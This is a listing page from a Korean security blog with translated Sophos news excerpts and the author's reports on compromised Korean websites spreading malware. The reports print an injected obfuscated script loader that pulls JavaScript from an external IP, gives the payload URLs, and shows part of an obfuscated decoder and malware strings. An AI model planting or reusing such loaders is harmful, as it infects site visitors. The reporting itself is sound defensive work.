security 썸네일형 리스트형 [Sophos] 9백만 대 이상의 PC 감염 - 제로액세스 봇넷 무방비 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18600 9백만 대 이상의 PC 감염 - 제로액세스 봇넷 무방비제로액세스(ZeroAccess)는 수년간 개인과 기업들을 괴롭혀온 엄청나게 널리 퍼진 맬웨어입니다. 이 맬웨어는 Windows의 새로운 아키텍쳐나 버전에 맞춰 발전해 왔습니다.소포스랩에서 우리는 더 많은 맬웨어를 다운로드하기 위한 명령을 받을 수 있는 P2P 봇넷을 희생 PC들에게 추가하면서 어떻게 제로액세스가 그 희생 PC들을 예속시키는 지 설명하면서, 제로액세스 루트킷의 이전 화신에 대해 깊이 있게 살펴보았습니다.가장 최근에, 소포스 연구원들은 제로액세스가 완전히 사용자모드 메모리로 작동하면서, 어떻게 전략에 있어.. 더보기 이제는 지친다! inews24.com 악성코드 유포지 총 정리!! 이제는 지친다!!! inews24.com 에서 유포중이다!주말마다 관리자는 무엇을 하고있을까?? 내부 소스에는 이와같이 스페이스와 탭으로 이루어진! 스크립트가 삽입! document.write(unescape("%3Cscript%20src%3Dhttp%3A%2F%2F205%2E164%2E5%2E190%2Fpic%2Fimg%2Ejs%3E%3C%2Fscript%3E")); -------------------------------------------------------------------------------------------- ~>http://205.164.5.190/pic/img.html (Yszz 1.3 vip) ~>http://205.164.5.190/pic/swfobject.js ~>http.. 더보기 [Sophos] 맬웨어 혹은 PUAs(potentially unwanted applications), 안드로이드에선 무엇이 더 나쁠까요? http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18500 새롭게 발견된 수많은 안드로이드 악성 어플리케이션들이 빠른 속도로 증가하고 있습니다. 올 해 소포스랩에서 발견한 유니크한 샘플 숫자만으로 보더라도, 우리는 2011년 전체에 비해 41배 증가한 것을 알 수 있습니다. 그리고 올해는 아직 9월까지인데도 말입니다. 흥미롭게도, Andr/Boxer 계열이 새롭게 발견된 샘플들의 거의 반을 차지합니다. Boxer는 SMS 사용료 사기 맬웨어인데, 특히 서유럽 시장을 타깃으로 하기 때문에 다른 나라 사용자들에게는 큰 위협을 가하지 않습니다.반대로, Sophos Mobile Security 사용자들이 소포스랩에 보낸 실제 발견 리포.. 더보기 m914.txt 악성코드 내에 일부분! Agent.aye V3LTray.exe nsavsvc.npc ws2_32.dll WSCEnumProtocols % w s o v e r % w s W i n S o c k e t A . d l l WSCWriteProviderOrder WSCInstallProvider WSCGetProviderPath ole32.dll CoCreateGuid SHLWAPI.dll StrStrIW WSCDeinstallProvider SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\ LoadAppInit_DLLs W i n S o c k e t A %s.%s.tmp \WindowsEx.dll \WinSocketA.dll \lpk.dll shlwapi.dll PathFileEx.. 더보기 [Sophos] 가짜 Microsoft Service Agreement 이메일에 숨어있는 Java 보안 결함에 대한 공격 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18400 가짜 Microsoft Service Agreement 이메일에 숨어있는 Java 보안 결함에 대한 공격온라인 스캐머들이 취약한 시스템에 악성 프로그램을 설치하기 위해 Oracle의 Java 소프트웨어 취약성을 악용하는 널리 퍼진 스팸 캠페인의 미끼로 Microsoft가 보내는 최신 이메일을 사용합니다.SANS 연구소의 인터넷 스톰 센터(Internet Storm Center) 전문가들은 오퍼레이터들이 어리석은 사용자들에게 Hotmail과 Skydrive와 같은 제품에 대한 서비스 협약(Services Agreement)의 변경에 관한 내용을 담고 있는 Microsoft.. 더보기 [Sophos] 브라우저에서 Java를 제거하는 방법 그리고 지금 바로 제거해야 하는 이유 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18300 브라우저에서 Java를 제거하는 방법 그리고 지금 바로 제거해야 하는 이유 여러분은 웹브라우저에서 여전히 Java를 실행시키고 있나요? 만약 여러분의 대답이 “예”이거나 “확실치 않다”라고 한다면, 지금이 바로 행동에 옮길 때입니다. 지금 바로, 사이버범죄자들은 여러분의 컴퓨터를 맬웨어로 감염시킬 수 있는 Java에 있는 심각한 보안 허점을 알고 악용할 것입니다. 그리고, 가장 나쁜 소식은 (4월부터 제로데이 취약점에 대해 알고 있었던) Oracle이 10월까지 그 문제에 대한 패치를 발표할 계획이 없다는 겁니다. 많은 사람들이 Oracle에 손가락질을 할 것이고 그들이.. 더보기 http://www.inews24.com 악성코드 유포중 ! * 현재 감염된 사이트 입니다. 접속시에 감염이 될 수 있으니 유의하시기 바랍니다! 근원지 : http://www.inews24.com 내 스크립트 ! 1차 연결 : http://69.46.86.221/pic/img.js 2차 아이프레임 : http://69.46.86.221/pic/img.js~> http://69.46.86.221/pic/img.html (404 Not Found)~> http://69.46.86.221/pic/css.html (익스플로릿 미삽입) [inews24 내 스크립트] function RDfADFLDEXDFu5(s) {var r = new Array();var curr = 0;while(s.charAt(curr) != '\n') {var tmp = 0;for (var i=6;.. 더보기 [Sophos] 브라우저와 이메일 패스워드를 뒤지는 Apple 좀비 맬웨어 ‘NetWeird’ http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18200 라우저와 이메일 패스워드를 뒤지는 Apple 좀비 맬웨어 ‘NetWeird’Mac 맬웨어에 대한 네이키드 시큐리티(Naked Security) 글을 올리면, 종종 논란이 되곤 합니다. 보통 그것은 맬웨어 자체 때문이 아니라, 우리가 그것에 대해 처음으로 작성한 것 때문입니다.다음은 어떻게 그것이 일어나는지 보여줍니다.우리가 글을 올립니다. 정치적으로 예민한 애플 광팬(Apple fanboys)들은 우리가 Cupertino(애플 본사가 있는 지역)를 싫어하기 때문에 Apple 맬웨어에 대해서만 적는다고 말하며, 멋지게 나섭니다.애플 광팬들은 Mac 맬웨어는 다른 모든 사람.. 더보기 인제대학교 일어일문학과 http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main 악성 코드 유포중 ! 유포 링크 : http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main 메인 스크립트 ! ---------------------------------------------------------------------------------------------- 디코딩을 위한 변형 ! 디코딩 후 ! 현재 서버는 죽어있는 상태입니다! =========================Server IP(s):0.0.0.0========================= 소스 확인 : view-source:http://homepage.inje.ac.kr/~japan/xe/index.php?mid=main (구글크롬) 바이러스 토탈 : https://www.virustotal.co.. 더보기 [Sophos] 페이스북에 피싱을 보고하는 방법 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=18000 페이스북은 오늘 9억5천5백만 사용자들을 타깃으로 하는 피싱 스캠에 대항하는 새로운 방법을 발표하였습니다.페이스북 시큐리티 페이지(Facebook Security page)에 올린 글에서, 페이스북은 일반 대중이 이제는 페이스북과 관련된 피싱 이메일을 직접 페이스북에 보고할 수 있다고 설명하였습니다.여러분이 해야 하는 일은 피싱 이메일을 다음 이메일 주소로 전달하는 게 전부입니다.: phish@fb.com페이스북은 그 글에서 이메일 메시지를 전달함으로써 피싱 공격을 방지하는데 도움이 되고, 피싱 웹사이트를 강제로 차단하는 것에 도움이 될 수 있다고 전합니다.:페이스북에 .. 더보기 이전 1 ··· 4 5 6 7 8 9 10 ··· 20 다음
